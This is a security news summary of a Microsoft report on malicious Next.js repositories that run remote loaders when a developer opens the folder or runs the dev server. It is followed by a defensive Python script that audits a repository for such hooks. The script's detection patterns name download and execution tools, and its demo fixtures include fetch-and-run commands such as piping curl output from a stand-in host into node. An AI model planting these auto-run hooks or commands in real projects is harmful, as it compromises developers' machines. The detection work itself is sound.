Overview
- Microsoft detailed a coordinated campaign using professional-looking Next.js and job-assessment repositories on GitHub and Bitbucket, with a limited set directly tied to observed compromises.
- Malicious logic triggers during normal developer activity: VS Code workspace automation on folder open, dev server runs through npm run dev, or backend startup. Each path fetches loaders, often hosted on Vercel, for in-memory execution.
- Compromised hosts register with attacker C2, then upgrade to a second-stage controller that runs tasks entirely in memory, rotates identifiers, tracks spawned processes, supports file discovery and exfiltration, and honors kill switches.
- Researchers reported evolving staging tactics that include GitHub gists and URL shorteners, a malicious npm package named eslint-validator pulling an obfuscated payload from Google Drive, and a Windows-only chain that downloads Node.js and uses certutil to execute Python malware; another variant retrieves JavaScript from an NFT contract on the Polygon blockchain.
- Microsoft urged enforcing VS Code Workspace Trust or Restricted Mode, applying Attack Surface Reduction rules, minimizing secrets on developer endpoints with short-lived tokens, containerizing untrusted code, and monitoring unusual Node execution and outbound connections. Public attribution remains unconfirmed, although vendor reporting links related activity to prior Contagious Interview operations and GitLab has banned 131 accounts.
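As an added defender-side example (not Microsoft's tooling and not code from the repositories described), the Python audit below checks a cloned repository for the two trigger points named above: VS Code tasks that run on folder open, and npm dev/lifecycle scripts that fetch or evaluate remote code. The command-line heuristics, the hypothetical hostnames and the sample files are constructed for the demo.

```python
"""Audit a cloned repo for the auto-run hooks this campaign abuses:
VS Code tasks with runOptions.runOn == "folderOpen" (run when a trusted
folder is opened) and package.json dev/start/lifecycle scripts whose
command fetches or evaluates remote content. Heuristics are assumptions."""
import json
import os
import re
import tempfile

# Command fragments that pull or run remote code (assumed heuristic list)
REMOTE_EXEC = re.compile(
    r"(curl|wget|Invoke-WebRequest|fetch\(|https?://|vercel\.app|"
    r"gist\.github|certutil|eval\(|node\s+-e)", re.IGNORECASE)
WATCHED_SCRIPTS = {"preinstall", "install", "postinstall", "prepare",
                   "dev", "start"}

def audit_repo(root):
    """Return (file, detail) findings for one checkout; [] when clean."""
    findings = []
    tasks_path = os.path.join(root, ".vscode", "tasks.json")
    if os.path.exists(tasks_path):
        with open(tasks_path) as fh:  # real tasks.json may be JSONC
            for task in json.load(fh).get("tasks", []):
                if task.get("runOptions", {}).get("runOn") == "folderOpen":
                    findings.append((".vscode/tasks.json",
                                     f"runs on folder open: {task.get('command')}"))
    pkg_path = os.path.join(root, "package.json")
    if os.path.exists(pkg_path):
        with open(pkg_path) as fh:
            for name, cmd in json.load(fh).get("scripts", {}).items():
                if name in WATCHED_SCRIPTS and REMOTE_EXEC.search(cmd):
                    findings.append(("package.json",
                                     f"script '{name}' pulls remote code: {cmd}"))
    return findings

def demo():
    """Build a constructed sample checkout (not a real repo) and audit it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".vscode"))
    with open(os.path.join(root, ".vscode", "tasks.json"), "w") as fh:
        json.dump({"version": "2.0.0", "tasks": [{
            "label": "setup", "type": "shell",
            "command": "node -e \"fetch('https://example.invalid/loader')\"",
            "runOptions": {"runOn": "folderOpen"}}]}, fh)
    with open(os.path.join(root, "package.json"), "w") as fh:
        json.dump({"scripts": {"dev": "curl -s https://example.invalid/l | node",
                               "build": "next build"}}, fh)
    return audit_repo(root)
```

Run against a checkout before opening it in a trusted workspace or running npm install; a clean repo yields an empty list.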